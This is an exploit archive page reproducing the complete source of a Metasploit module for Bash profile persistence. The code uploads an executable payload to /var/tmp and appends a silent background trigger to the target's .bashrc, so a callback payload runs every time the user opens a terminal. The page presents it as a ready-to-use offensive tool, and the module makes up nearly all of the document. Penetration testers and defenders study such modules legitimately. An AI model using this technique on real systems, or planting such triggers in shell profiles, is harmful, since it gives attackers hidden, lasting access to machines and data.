exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Bash Profile Persistence

Bash Profile Persistence
Posted Dec 16, 2019
Authored by Michael Long | Site metasploit.com

This Metasploit module writes an execution trigger to the target's Bash profile. The execution trigger executes a call back payload whenever the target user opens a Bash terminal. A handler is not run automatically, so you must configure an appropriate exploit/multi/handler to receive the callback.

tags | exploit, bash
SHA-256 | 4392eb90277372be9287a047138be4763f374339baef421bece0ca945a6dac1e

Bash Profile Persistence

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Unix

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Bash Profile Persistence',
'Description' => %q{"
This module writes an execution trigger to the target's Bash profile.
The execution trigger executes a call back payload whenever the target
user opens a Bash terminal. A handler is not run automatically, so you
must configure an appropriate exploit/multi/handler to receive the callback.
"},
'License' => MSF_LICENSE,
'Author' =>
[
'Michael Long <bluesentinel[at]protonmail.com>'
],
'DisclosureDate' => 'Jun 8 1989', # First public release of Bourne Again Shell
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'SessionTypes' => ['meterpreter', 'shell'],
'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'Payload' => {
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'References' =>
[
['URL', 'https://attack.mitre.org/techniques/T1156/']
]
))

register_options(
[
OptString.new('BASH_PROFILE', [true, 'Target Bash profile location. Usually ~/.bashrc or ~/.bash_profile.', '~/.bashrc']),
OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp/'])
]
)
end

def exploit

# expand home directory path (i.e. '~/.bashrc' becomes '/home/user/.bashrc')
profile_path = datastore['BASH_PROFILE']
if profile_path.start_with?('~/')
home_directory = get_env('$HOME')
profile_path.sub!(/^~/, home_directory)
end

# check that target Bash profile file exists
unless exist?(profile_path)
fail_with Failure::NotFound, profile_path
end
print_good("Bash profile exists: #{profile_path}")

# check that target Bash profile file is writable
unless writable?(profile_path)
fail_with Failure::NoAccess, profile_path
end
print_good("Bash profile is writable: #{profile_path}")

# create Bash profile backup on local system before persistence is added
backup_profile = read_file(profile_path)
backup_profile_path = create_backup_file(backup_profile)
print_status("Created backup Bash profile: #{backup_profile_path}")

# upload persistent payload to target and make executable (chmod 700)
payload_file = datastore['PAYLOAD_DIR'] + Rex::Text.rand_text_alpha(10..16)
upload_and_chmodx(payload_file, payload.encoded)

# write payload trigger to Bash profile
exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" + "\n" # send stdin,out,err to /dev/null
append_file(profile_path, exec_payload_string)
print_good("Created Bash profile persistence")
print_status("Payload will be triggered when target opens a Bash terminal")
print_warning("Don't forget to start your handler:")
print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
end

# create a backup copy of the target's Bash profile on the local system before persistence is added
def create_backup_file(backup_profile)
begin
hostname = session.sys.config.sysinfo["Computer"]
rescue
hostname = cmd_exec("hostname")
end

timestamp = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")

log_directory_name = ::File.join(Msf::Config.log_directory, 'persistence/' + hostname + timestamp)

::FileUtils.mkdir_p(log_directory_name)

log_file_name = log_directory_name + "/Bash_Profile.backup"
file_local_write(log_file_name, backup_profile)
return log_file_name
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close